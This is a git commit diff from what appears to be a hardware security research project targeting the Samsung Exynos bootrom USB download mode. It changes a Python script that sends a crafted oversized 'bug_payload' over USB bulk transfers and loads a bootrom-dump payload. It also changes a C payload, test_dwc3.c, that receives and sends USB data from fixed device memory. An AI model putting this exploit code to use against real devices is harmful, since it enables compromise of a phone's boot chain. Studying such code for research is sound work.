working usb send
This commit is contained in:
parent
a9def4a27d
commit
8c1f008deb
@ -82,7 +82,7 @@ class ExynosDevice():
|
||||
# self.write(b"\xaa" * CHUNK_SIZE, CHUNK_SIZE)
|
||||
|
||||
transferred = ctypes.c_int()
|
||||
bug_payload = p32(0) + p32(MAX_PAYLOAD_SIZE + 0x100) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||
bug_payload = p32(0) + p32(0x201 + 2 + MAX_PAYLOAD_SIZE + 0x7) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
|
||||
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
|
||||
assert res == 0
|
||||
@ -91,8 +91,10 @@ class ExynosDevice():
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||
assert res == 0
|
||||
|
||||
payload = b"\xaa" * (0x401 - (MAX_PAYLOAD_SIZE - 0x200))
|
||||
payload = b"\xaa" * 0x200
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
|
||||
while True:
|
||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
|
||||
pass
|
||||
|
||||
def test_bug(self):
|
||||
@ -278,6 +280,7 @@ if __name__ == "__main__":
|
||||
# wait_for_device()
|
||||
exynos = ExynosDevice()
|
||||
exynos.test_bug_2()
|
||||
sys.exit(0)
|
||||
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
|
||||
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
|
||||
exynos.exploit(open(path, "rb").read())
|
||||
|
||||
62
test_dwc3.c
62
test_dwc3.c
@ -10,25 +10,16 @@ extern void sleep(int endpoint,uint32_t timeout);
|
||||
#define recv_buffer 0x02021800 + 0x2000
|
||||
#define data_received 0x02021800 + 0x2004
|
||||
|
||||
// do {
|
||||
// /* loops until image has been received */
|
||||
// usb_event_handler();
|
||||
// iVar2 = download_ready?(); #TODO, set some global to indicate readyness
|
||||
// } while (iVar2 == 0);
|
||||
|
||||
void recv_data_cb(uint32_t endpoint, uint32_t len){
|
||||
void *rbuf;
|
||||
void *dest_buf = (void *)recv_buffer;
|
||||
volatile void *dref = (void *)data_received;
|
||||
|
||||
rbuf = get_endpoint_buffer(endpoint);
|
||||
for(int i= 0; i < len; i++){
|
||||
rbuf = get_endpoint_buffer(2);
|
||||
*(char *)dest_buf = *(char *)(void *)((int)rbuf + i);
|
||||
}
|
||||
// while(1){}
|
||||
// asm("mov x0, #0x0");
|
||||
// asm("br x0");
|
||||
*(uint8_t *)dref = 3;
|
||||
*(uint8_t *)dref = 1; // Mark as ready
|
||||
}
|
||||
|
||||
void recv_data(){
|
||||
@ -38,18 +29,61 @@ void recv_data(){
|
||||
volatile void *dref = (void *)data_received;
|
||||
*(uint8_t *)dref = 0;
|
||||
|
||||
maybe_usb_setup_read(2, recv_data_cb, 1);
|
||||
maybe_usb_setup_read(2, recv_data_cb, 0x200);
|
||||
void *rbuf = get_endpoint_buffer(2);
|
||||
dwc3_ep0_start_trans(2, (uint32_t)rbuf, 0x200);
|
||||
while(1){
|
||||
usb_event_handler();
|
||||
if(*(uint8_t *)dref == 3){
|
||||
if(*(uint8_t *)dref == 1){
|
||||
break;
|
||||
}
|
||||
sleep(1, 10);
|
||||
}
|
||||
}
|
||||
|
||||
void send_data(uint32_t *address, uint32_t size)
|
||||
{
|
||||
// asm("stp x29, x30, [sp,#-48]!");;
|
||||
// asm("mov w3, #0x0");
|
||||
// asm("bfxil w3, w1, #0, #24");
|
||||
// asm("mov w1, #0xc12");
|
||||
// asm("mov x29, sp");
|
||||
// asm("stp x19, x20, [sp,#16]");
|
||||
// asm("mov x5, #0xc834");
|
||||
// asm("mov w20, #0x1");
|
||||
// asm("movk x5, #0x1540, lsl #16");
|
||||
// asm("ldr x2, [x29,#40]");
|
||||
// asm("mov x4, #0xc838");
|
||||
// asm("orr w6, w1, w20");
|
||||
// asm("movk x4, #0x1540, lsl #16");
|
||||
// asm("mov x19, #0xc83c");
|
||||
// asm("movk x19, #0x1540, lsl #16");
|
||||
// asm("stp w3, w1, [x2,#8]");
|
||||
// asm("mov w3, #0x406");
|
||||
// asm("stp w0, wzr, [x2]");
|
||||
// asm("mov w0, w20");
|
||||
// asm("ldr x1, [x29,#40]");
|
||||
// asm("strb w6, [x2,#12]");
|
||||
// asm("mov x2, #0x27c8");
|
||||
// asm("str w1, [x5]");
|
||||
// asm("mov w1, #0x1388");
|
||||
// asm("str wzr, [x4]");
|
||||
// asm("str w3, [x19]");
|
||||
// asm("blr x2");
|
||||
// asm("mov w0, w20");
|
||||
// asm("ldr w1, [x19]");
|
||||
// asm("ldp x19, x20, [sp,#16]");
|
||||
// asm("ldp x29, x30, [sp],#48");
|
||||
// asm("ret");
|
||||
}
|
||||
|
||||
int main() {
|
||||
while(1){
|
||||
recv_data();
|
||||
send_data((uint32_t *) recv_buffer, 0x200);
|
||||
}
|
||||
|
||||
|
||||
|
||||
// recv_data();
|
||||
// sleep(1, 5000);
|
||||
asm("mov x0, #0x0");
|
||||
|
||||
Loading…
Reference in New Issue
Block a user